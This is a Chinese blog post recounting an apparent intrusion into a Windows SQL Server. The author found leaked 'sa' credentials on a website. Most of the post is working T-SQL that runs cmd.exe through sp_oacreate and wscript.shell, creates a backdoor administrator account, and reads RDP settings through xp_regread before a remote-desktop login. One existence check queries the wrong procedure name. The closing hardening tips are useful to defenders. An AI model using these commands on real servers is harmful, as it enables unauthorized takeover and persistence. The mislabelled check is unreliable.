介绍
SQL Server 也称Mssql Server,是微软家的数据库,常见于操作系统是Windows Server的服务器上
SQL Server的默认超级管理员是sa
,在早期版本中,SQL Server的权限非常大,是SYSTEM
权限
sa
用户不仅能修改所有数据库的内容,还能直接对windows的注册表进行修改,执行命令等
渗透过程
获取数据库密码
通过SQL Server提权渗透,需要数据库的账号密码,不巧的是,我在扫描网站的目录时。发现了一处信息泄露,泄露的SQL Server的用户和密码,更巧的是这个网站使用的是sa
用户,还告诉了我SQL Server的IP端口,于是我尝试连接,成功连上数据库。
执行命令
成功连上数据库,基本上就一半成功了,接下来尝试执行命令
尝试xp_cmdshell
尝试直接执行命令
exec master..xp_cmdshell 'whoami'
失败,尝试启用xp_cmdshel
- 确认
xp_cmdshell
是否存在select count(*) from master.dbo.sysobjects where xtype='x' and name='sp_oacreate';
结果为1,则证明存在 - 使用
xp_cmdshell
执行命令,发现报错xp_cmdshell
存在,却无法执行命令,我当时怀疑是xplog70.dll
被删了,xp_cmdshell
是通过xplog70.dll
来执行命令的 - 尝试重新启用
xp_cmdshell
,结果命令结果告诉我xp_cmdshell
不存在,在高级配置选项里也没有。
- 于是我又尝试重新加载
xp_cmdshell
,dbcc addextendedproc("xp_cmdshell","xplog70.dll");
结果告诉我数据库中已存在名为 'xp_cmdshell' 的对象。
既然已经存在,那我就删了再重建
结果删都不让我删
我当时这个人直接傻掉,第一次遇到这种情况,存在又不存在的'xp_cmdshell'
sp_oacreate
于是xp_cmdshell
没法用,我尝试使用sp_oacreate
提权
- 尝试用系统
wscript.shell
来执行系统命令declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net users > F:\tmp\1.txt'
执行
net user
命令,并将命令的结果写入网站目录下1.txt
文件中,通过浏览器访问该文件,获取命令回显
访问文件,发现命令执行成功 - 创建用户,添加用户到
administrators
组declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user abcd 123456 /add' exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators abcd /add'
- 查看远程桌面服务是否启动
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server' ,'fDenyTSConnections'
0表示开启
- 获取远程桌面端口
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
- 用windows自带的远程桌面连接成功连上服务器
发现了这电脑上存在杀软,居然是电脑管家。。。
翻看日志,发现我用 'xp_cmdshell' 执行的命令被这电脑管家拦截了。。。
总结
- 数据库的管理员账号不要使用于生产环境,一旦成功登录,基本上就离控住你电脑不远了
- 记得清理网站目录下的文件,防止被利用
- 腾讯电脑管家用处不大,但总比裸奔好
Comments NOTHING